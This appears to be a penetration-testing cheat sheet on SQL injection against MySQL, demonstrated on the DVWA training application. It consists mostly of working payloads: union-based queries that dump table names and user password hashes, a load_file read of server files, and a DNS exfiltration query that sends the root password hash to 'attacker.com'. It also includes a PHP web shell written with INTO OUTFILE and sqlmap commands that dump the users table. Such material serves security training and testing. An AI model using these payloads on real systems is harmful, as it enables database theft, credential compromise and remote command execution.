Penetration Testing with OWASP Top 10 - 2017 A1 Injection
SQL Injection on MySQL
Blind SQL Injection
6' or '1'='1
Error-based SQL Injection
1'
Union-based SQL Injection
Find the number of columns associated with the query
1' order by 1,2--
1' order by 3--
Based on the error message above, we can conclude that the query only associate with two columns.
Next, we can try to obtain the information using UNION keyword.
Extract Information
1' union select group_concat(version(), ' ', database(), ' ', user(), ' ', @@datadir, ' ', @@hostname),2--
Extract More Information
Extract Table Name
1' union select group_concat(table_name),database() from information_schema.tables where table_schema = 'dvwa'--
Another Place to Extract Table Name
Extract Column Name
1' union select group_concat(column_name),2 from information_schema.columns where table_name='users'--
To retrieve tables from all database
1' union select table_schema, GROUP_CONCAT(DISTINCT table_name SEPARATOR ', ') FROM information_schema.columns GROUP BY table_schema--
To retrieve columns from selected database
1' union select table_name, GROUP_CONCAT(DISTINCT column_name SEPARATOR ', ') FROM information_schema.columns WHERE table_schema = 'dvwa' GROUP BY table_name--
1' union select table_name, GROUP_CONCAT(DISTINCT column_name SEPARATOR ', ') FROM information_schema.columns WHERE table_schema = 0x64767761 GROUP BY table_name--
Dump Data From Extracted Table and Column Names
1' union select user, password from users--
"Decrypt" MD5 Value Obtained
Insufficient of mysqli_real_escape_string() method
1 or 1=1
Exploitation: File inclusion using load_file() function
1' union select load_file("C:\\xampp\\htdocs\\dvwa\\login.php"),null--
Exploitation: Data Exfiltration with DNS using load_file() function
SELECT LOAD_FILE(CONCAT('\\\\', (SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.attacker.com\\foobar'));
Exploitation: Create file using OUTFILE function
show variables like 'datadir';
select "<?php system($_GET['cmd']); ?>" INTO OUTFILE "../../htdocs/cmd.php";
Automated SQLi using SQLMap
sqlmap -u "http://192.168.66.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=ipp0lndfsu08f2ucl0tifm9v25" --dbs
parameter id is injectable |
Databases |
sqlmap -u "http://192.168.66.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=ipp0lndfsu08f2ucl0tifm9v25" --tables -D dvwa
Tables from database DVWA |
sqlmap -u "http://192.168.66.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=ipp0lndfsu08f2ucl0tifm9v25" --columns -D dvwa -T users
Columns from table users |
sqlmap -u "http://192.168.66.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=ipp0lndfsu08f2ucl0tifm9v25" --dump -D dvwa -T users
Data dump with cracked password |
How SQLMap works?
SQLMap will keep sending the request to the target server with User-Agent "sqlmap" by default |
Study and Decode URL in Wireshark
Database
SELECT NULL,CONCAT(0x71706b6a71,IFNULL(CAST(schema_name AS CHAR),0x20),0x716b626b71) FROM INFORMATION_SCHEMA.SCHEMATA
Table
SELECT NULL,CONCAT(0x71706b6a71,IFNULL(CAST(table_name AS CHAR),0x20),0x716b626b71) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x64767761)
Data Dump
SELECT CONCAT(0x7162787871,IFNULL(CAST(`user` AS CHAR),0x20),0x7a6264797275,IFNULL(CAST(avatar AS CHAR),0x20),0x7a6264797275,IFNULL(CAST(failed_login AS CHAR),0x20),0x7a6264797275,IFNULL(CAST(first_name AS CHAR),0x20),0x7a6264797275,IFNULL(CAST(last_login AS CHAR),0x20),0x7a6264797275,IFNULL(CAST(last_name AS CHAR),0x20),0x7a6264797275,IFNULL(CAST(password AS CHAR),0x20),0x7a6264797275,IFNULL(CAST(user_id AS CHAR),0x20),0x7176707171),NULL FROM dvwa.users
Reference:
https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/